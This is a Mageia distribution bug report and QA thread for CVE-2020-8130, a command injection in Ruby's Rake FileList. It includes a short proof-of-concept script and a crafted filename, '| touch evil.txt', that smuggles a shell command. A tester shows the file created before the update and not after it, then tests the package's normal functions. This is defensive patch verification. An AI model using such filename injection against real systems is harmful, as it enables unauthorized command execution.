Bug 26266

No registered nor recent maintainer, so assigning globally.

Assignee: bugsquad => pkg-bugs

ruby 2.7.0 contains 13.0.1 so it is fine in cauldron

I will update ruby-rake in 7

Packages have been uploaded to 7/core/updates_testing:

ruby-rake-12.3.0-21.mga7.src.rpm
ruby-rake-12.3.0-21.mga7.noarch.rpm

A simple exploit is available on https://hackerone.com/reports/651518

Advisory:
========================

Updated ruby-rake package fixes security vulnerability:

There is an OS command injection vulnerability in Rake < 12.3.3 in
Rake::FileList when supplying a filename that begins with the pipe character
`|` (CVE-2020-8130).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130
https://www.debian.org/lts/security/2020/dla-2120

Source RPM: ruby-2.7.0-26.mga8.src.rpm => ruby-rake-12.3.0-20.mga7.src.rpm
CC: (none) => pterjan
Status comment: Fixed upstream in 12.3.3 => (none)
Assignee: pterjan => qa-bugs
Whiteboard: MGA7TOO => (none)

mga7, x86_64

CVE-2020-8130
https://hackerone.com/reports/651518
$ cat poc_rake.rb
#!/bin/ruby
require 'rake'
list = Rake::FileList.new( Dir.glob( '*' ) )
p list
list.egrep( /something/ )

$ touch "| touch evil.txt"
$ ls -1
poc_rake.rb
report.26266
'| touch evil.txt'

For this test I left out the bundling stuff because I have no real idea about enabling it.  The script should work without it AFAICS.
$ ruby poc_rake.rb
["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"]
#report.26266#:10:list.egrep( /something/ )
report.26266:10:list.egrep( /something/ )
poc_rake.rb:6:list.egrep( /something/ )
$ ls -1
evil.txt
poc_rake.rb
'#report.26266#'
report.26266
'| touch evil.txt'

So evil.txt has been created.

Updated the package and tested the exploit again.

$ rm -f evil.txt
$ ruby poc_rake.rb
["#report.26266#", "| touch evil.txt", "report.26266", "poc_rake.rb"]
#report.26266#:10:list.egrep( /something/ )
#report.26266#:21:#report.26266#:10:list.egrep( /something/ )
#report.26266#:22:report.26266:10:list.egrep( /something/ )
#report.26266#:23:poc_rake.rb:6:list.egrep( /something/ )
report.26266:10:list.egrep( /something/ )
poc_rake.rb:6:list.egrep( /something/ )
$ ls -1
poc_rake.rb
'#report.26266#'
report.26266
'| touch evil.txt'

No more evil.txt.

Copied files from /usr/share/gems/gems/rake-12.3.0/doc/example/ to a local directory and ran rake against Rakefile2.

$ cat Rakefile2
# Example Rakefile -*- ruby -*-
# Using the power of Ruby

task :default => [:main]

def ext(fn, newext)
  fn.sub(/\.[^.]+$/, newext)
end

SRCFILES = Dir['*.c']
OBJFILES = SRCFILES.collect { |fn| ext(fn,".o") }

OBJFILES.each do |objfile|
  srcfile = ext(objfile, ".c")
  file objfile => [srcfile] do |t|
    sh "gcc #{srcfile} -c -o #{t.name}"
  end
end

file "main" => OBJFILES do |t|
  sh "gcc -o #{t.name} main.o a.o b.o"
end

task :clean do
  rm_f FileList['*.o']
  Dir['*~'].each { |fn| rm_f fn }
end

task :clobber => [:clean] do
  rm_f "main"
end

task :run => ["main"] do
  sh "./main"
end

$ cp Rakefile2 Rakefile
$ rake clean
rm -f 
$ rake run
gcc a.c -c -o a.o
gcc main.c -c -o main.o
gcc b.c -c -o b.o
gcc -o main main.o a.o b.o
./main
In function a
In function b
$ ls
 a.c   b.o      main.o        Rakefile1         report.26266
 a.o   main*    poc_rake.rb   Rakefile2        '| touch evil.txt'
 b.c   main.c   Rakefile     '#report.26266#'
$ ./main
In function a
In function b
$ rake clean
rm -f a.o b.o main.o

ruby-rake can do a lot more but this shows that the basic functions work.

CC: (none) => tarazed25
Whiteboard: (none) => MGA7-64-OK

Could this be applied to political campaigns? Eliminating "evil.txt" there would be a Good Thing. For everybody.

Validating. Advisory in Comment 4.

CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => validated_update

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2020-0121.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED